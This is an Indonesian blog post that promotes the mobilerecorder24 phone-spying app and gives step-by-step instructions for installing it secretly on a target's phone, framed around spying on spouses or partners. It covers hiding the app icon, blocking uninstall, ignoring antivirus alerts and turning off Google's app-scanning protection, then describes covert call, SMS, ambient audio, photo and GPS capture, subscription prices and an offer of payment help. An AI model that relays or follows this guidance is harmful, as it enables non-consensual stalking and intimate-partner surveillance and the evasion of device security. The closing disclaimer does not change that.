Wednesday, October 26, 2016

Aplikasi Penyadap Percakapan Telepon

Ada banyak karakteristik penyadapan yang ingin dilakukan utamanya pasangan yang sudah menikah atau sekedar pacaran. Ada yang hanya ingin menyadap percakapan telepon saja , percakapan BBM saja namun sebagian besar menginginkan semua percakapan baik itu telpon, SMS, BBM, LINE dan aplikasi chat lainnya.

Secara umum aplikasi sadap untuk iOS atau Android dibagi dalam 2 kategori yaitu percakapan basic dan juga percakapan umum. Pengertian basic disini adalah percakapan seperti SMS, panggilan telepon dan untuk percakapan umum meliputi SMS, Call, BBM, WA, LINE dan lainnya.

Hampir sebagian besar aplikasi Sadap untuk menggunakan fitur sadap percakapan basic tidak dibutuhkan root untuk Android namun untuk iOS harus dilakukan proses Jailbreak. Sedang kan sebaliknya untuk percakapan umum bagi pengguna Android juga diwajibkan untuk melakukan root.

Pada bahasan artikel kali ini saya akan membahas model penyadapan basic dimana untuk pengguna Android, iOS dan jenis ponsel lainnya tidak mewajibkan untuk melakukan root. Sesuai judulnya penyadapan ini menitik beratkan pada proses penyadapan telepon namun pada intinya aplikasi ini juga dapat menyadap SMS, lokasi target dengan GPS, memfoto otomatis dan merekam lingkungan sekitar secara otomatis.

(Baca juga : Butuh Pinjaman Uang, Begini Caranya)

Saya mengatakan aplikasi ini saat ini yang terbaik karena menawarkan kelebihan lainnya yaitu dapat melakukan proses foto (Stealt Regime) dengan sendirinya dan juga dapat merekam suara di sekitar dengan sendirinya (Stealt Regime). Semua proses ini pastinya dapat di download atau hanya didengarkan saja. Kelebihan lainnya adalah aplikasi ini trial selama 7 hari dan untuk melihat semua rekaman atau percakapan SMS dan lokasi cukup menggunakan ponsel saja. Fitur lengkap dari aplikasi mobilerecorder24 adalah :
  • Stealth Regine: tidak ada pemberitahuan, ikon dapat dihapus dari daftar aplikasi.
  • Otomatis menyimpan sms dan catatan panggilan *
  • Melacak lokasi (GPS) secara otomatis
  • Rekaman audio tersembunyi
  • Perintah remote: Hidupkan / wifi dan mobile data, mengunci / membuka telepon, start / stop merekam, dll
Bagi Anda yang tertarik silakan download aplikasi mobilerecorder24 untuk lebih jelasnya silakan kunjungi situs resminya di alamat : http://mobilerecorder24.com/, silakan download di link yang sudah disediakan. Ukuran file juga tidak terlalu besar hanya sebesar 1,6 MB. Ada banyak pilihan untuk nama aplikasi, silakan lihat di : https://mobilerecorder24.com/install.html.

Pada contoh tutorial ini Saya menggunakan ponsel Android OS 4.2.2 merek Samsung Galaxy Ace 3 GT-S7270. Karena di download diluar Play Store silakan lakukan pengaturan di ponsel yang ingin disadap pada saat selesai mendownlod dan akan menginstal aplikasi ini. Beri tanda centang pada sumber yang tidak diketahui. Selanjutnya ikuti petunjuk yang ada di aplikasi tersebut. Jika ponsel yang ingin di sadap menggunakan aplikasi Clean Master atau CC Cleaner maka akan terdekteksi sebagai virus, biarkan saja karena tidak akan ada masalah pada ponsel yang di sadap.

Jika proses download selesai silakan lakukan pengaturan. Untuk aplikasi mobilerecorder24 proses pengaturan sedikit berbeda dengan aplikasi sadap lainnya. Dibutuhkan akun email aktif dimana email ini nantinya berfungsi untuk mendapatkan password (kata sandi), jadi pada saat email di daftarkan maka untuk password akan dikirim kan ke alamat email tersebut.


Aplikasi ini juga dapat di sembunyikan (hide) seperti halnya aplikasi sadap lainnya dengan nama yang juga tidak mengandung nama Spy (sadap) jadi tidak akan menimbulkan kecurigaan. Ada juga opsi agar aplikasi ini tidak dapat di hapus yaitu pada saat instalasi silakan beri centang pada menu Aplication protection.

Untuk melihat hasil penyadapan silakan masuk dari link yang disediakan di dalam email saat membuat akun atau silakan kunjungi situs resminya di alamat : https://cp.mobilerecorder24.com atau di alamat : https://my.mrecorder.com/#/login dapat menggunakan ponsel ataupun PC. Masukkan alamat email dan kata sandi. Jika sudah tampilan akan seperti pada gambar di bawah ini.


Silakan tekan pada menu jenis ponsel seperti pada gambar diatas. Pada saat pertama kali mengakses akun akan tampil hanya tulisan First Connection saja. Silakan tunggu beberapa saat setelah itu reload lagi browser sehingga muncul menu penyadapan seperti pada gambar di bawah ini. Proses menunggu ini juga tergantung koneksi internet di ponsel target, jika terhubung dengan koneksi WiFi IndiHome atau sejenisnya relatif akan lebih lancar.


Keterangan :
  • A : Proses perekaman lingkungan di sekitar ponsel yang di sadap dengan durasi waktu 9:59 menit / 10 menit sesuai dengan perintah yang di inginkan dimulai dari 10 menit hingga 10 jam. 
  • B : Foto otomatis yang dilakukan oleh ponsel yang disadap. Untuk proses ini tidak bisa diatur terkadang pada saat ponsel pada posisi di letakkan sehingga objek kandang hanya gambar hitam karena posisi ponsel yang tergeletak ke bawah. Namun hebatnya foto ini seperti hasil perekaman video. Untuk melihat hasilnya silakan klik pada foto berulang ulang (Click on image to show the next one. 15 of 20)
  • C : Proses penyadapan SMS yang dikirm
  • D : penyadapan rekaman yang masuk ke ponsel.
Sesuai dengan hasil uji coba yang sudah Saya lakukan, untuk proses penyadapan tidak membutuhkan lama. Jadi misal ada panggilan masuk selesai dan di reload maka proses perekaman percakapan panggilan hanya butuh 1 - 2 menit saja. Hal ini juga berlaku untuk SMS. Untuk perintah lainnya silakan pilih sesuai yang Anda inginkan di menu Commands kemudian klik Send. tunggu beberapa menit reload browser dan apa yang Anda perintahkan sudah muncul dengan sendirinya. Penting untuk di catat bahwa aplikasi ini akan bekerja pada ponsel yang terhubung dengan koneksi internet.

Petunjuk penting setelah menginstal aplikasi Sadap. Silakan lakukan pengaturan diponsel target agar aplikasi tidak terdeteksi sebagai virus oleh Android. Cari menu Setelan Google. Pada menu Layanan silakan pilih menu Keamanan. Lanjutkan pada menu Verifikasi Aplikasi silakan uncheck (hilangkan tanda centang) pada menu Pindai perangkat untuk mengetahui ancaman keamanan Google secara berkala akan memeriksa perangkat dan mencegah atau memperingatkan tentang potensi bahaya.


Harga langganan yang ditawarkan oleh aplikasi ini juga terbilang cukup murah dengan fitur yang ditawarkan. Hal ini karena mempertimbangkan kelancaran semua proses penyadapan yang ditawarkan oleh aplikasi ini. Kelebihan lainnya adalah untuk GPS atau lokasi ponsel target sesuai dengan Device Manager Google dengan radius akurasi mencapai 20 meter.  Contoh gambar dibawah ini adalah lokasi ponsel saya sesuai dengan tampilan di Google Maps.


Berikut ini daftar harga untuk berlangganan aplikasi mobilerecorder24. Saat ini hanya ada opsi pembayaran untuk 1 bulan saja.


Untuk paket Standar Plan dengan harga $2 / bulan dengan fitur yang ditawarkan adalah call log (tampilan nomor panggilan masuk dan keluar), penyadapan SMS dan remote commands.

Advanced Plan dengan fitur yang ditawarkan adalah Call log, recorder SMS, Remote Commands, Location Tracking dan recorder Calls di tawarkan dengan harga $5 / bulan. Dan untuk Pro Plan paket ini komplit sama seperti versi trial dengan harga $10 / bulan.

Jika Anda tertarik ingin menggunakan aplikasi ini dan kebetulan tidak memiliki kartu kredit (CC), PayPal atau pembayaran online lainnya Kami siap membantu. Untuk lebih jelasnya silakan kontak kami di nomor yang ada di menu Kontak.

Aplikasi di atas tidak untuk digunakan untuk tindakan kejahatan atau tindakan lainnya yang dapat merugikan orang lain. Gunakan aplikasi ini secara bijak untuk memantau anak-anak Anda, karyawan Anda atau keperluan positif lainnya.

No comments:

Post a Comment